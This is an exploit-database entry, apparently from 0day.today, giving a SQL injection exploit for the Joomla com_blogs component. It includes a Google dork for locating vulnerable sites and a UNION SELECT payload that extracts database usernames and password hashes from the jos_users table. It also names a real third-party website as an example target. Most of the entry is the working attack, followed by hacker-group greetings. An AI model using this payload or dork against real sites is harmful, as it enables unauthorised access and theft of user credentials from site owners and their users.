Joomla Component com_blogs SQL injection vulnerability

2010-08-27T00:00:00
ID 1337DAY-ID-13872
Type zdt
Reporter ibl13Z
Modified 2010-08-27T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ======================================================
Joomla Component com_blogs SQL injection vulnerability
======================================================


~[+] Exploit Title: Joomla Component Blogs SQL injection vulnerability
~[+] Author : ibl13Z [at]hackermail.com
~[+] Dork : "inurl:com_blogs"



~[+] Vulnerable :
http://127.0.0.1/index.php?option=com_blogs&task=details&b_id=[CrutZ]

~[+] Exploit:
/index.php?option=com_blogs&task=details&b_id=173 /**/ AND /**/ 1=2 /**/ UNION /**/ SELECT /**/ 0,1,2,3,version(),database(),concat(username,0x3a,password) /**/ from /**/ jos_users--

~[+] Example :
http://www.mumcentremalaysia.com/index.php?option=com_blogs&task=details&b_id=173 /**/ AND /**/ 1=2 /**/ UNION /**/ SELECT /**/ 0,1,2,3,version(),database(),concat(username,0x3a,password) /**/ from /**/ jos_users--



~[+] Thanks To :

~[+] IndonesianCoder Team | MagelangCyber Team | Kill9-Crew | MalangCyber Team | IndonesianHacker Team
~[+] tukulesto,kaMtiEz,arianom,N4CK0,Jundab,Hakz,bobyhikaru,gonzhack,senot,CS-31
~[+] Contrex,YadoY666,Anharku,Xadal,yur4kh4,Pathloader,cimpli,MarahMerah,r3m1ck
~[+] Gh4mb4s,Jack-,VycOd,otong,geni212, etc..


~[+] Note :

~[+] WE ARE ONE UNITY, WE ARE A CODER FAMILY, AND WE ARE INDONESIAN CODER TEAM
~[+] jika kami bersama nyalakan tanda bahaya :)
~[+] lady_rose : dimana kau berada..



#  0day.today [2018-01-05]  #